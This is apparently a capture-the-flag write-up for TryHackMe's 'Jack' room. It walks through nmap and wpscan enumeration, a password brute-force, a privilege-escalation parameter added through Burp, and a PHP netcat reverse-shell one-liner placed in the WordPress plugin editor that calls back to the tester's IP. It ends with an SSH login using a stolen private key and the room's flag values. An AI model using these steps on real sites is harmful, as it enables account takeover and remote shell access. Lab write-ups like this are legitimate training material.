NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.
Today let’s play Tryhackme’s Jack at
As usual we perform nmap scan to identify the running service and all open ports.
:- nmap -A jack.thm
As nmap scan result show there are two ports are open 80 and 22 and on port 80 wordpress is hosted so we directly go in the way to exploit the wordpress.
Now we start enumeration about wordpress using wpscan .
:- wpscan –url jack.thm -e
Wpscan list out the three users as shown in figure wendy,danny , jack
Now we got the user let bruteforce the password using wpscan .
:- wpscan –url jack.thm –password /usr/share/wordlist/fasttrack.txt
And after few minutes we got the username and password .
Now let go to wp-login and login with wendy / changelater
After login we get a normal WordPress user and which make a quite complex to get a reverse shell but when you are a core Pentester then you can easily find the way to penetrate things .
So after good research I found a exploit in searchsploit .
After reading this exploit manually we understand that how we exploit it through burp suite.
This is the parameter which help us to bypass the normal user account to administrator account .
What we done is just simply pass update request and capture it using Burpsuite .
After capturing the request we add a exploit parameter in request and put the value administrator
And on first click It work after forwarding the request we check the dashboard and we got the administrator account of WordPress and now we can try to get the reverse shell .
Now we have a administrator account so we put some one linear netcat reverse shell code in plugin editor and update it and then activate the plugin and finally we got our shell using netcat .
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.3.122 7777 >/tmp/f")?>
After getting the shell i just enumerate all access dir and file and got some file in /var/backups File system . Here I get the private key of the user and I just get the detail of the user by seeing the passwd file which is jack .
Now we have a private key of the user , we can ssh the user easily
:- ssh -i id_rsa firstname.lastname@example.org
And here we get the user flag , Now our next target is to get root flag .
user.txt = 0052f7829e48752f2e7bf50f1231548a root.txt = b8b63a861cc09e853f29d8055d64bffb
Author – Puckiestyle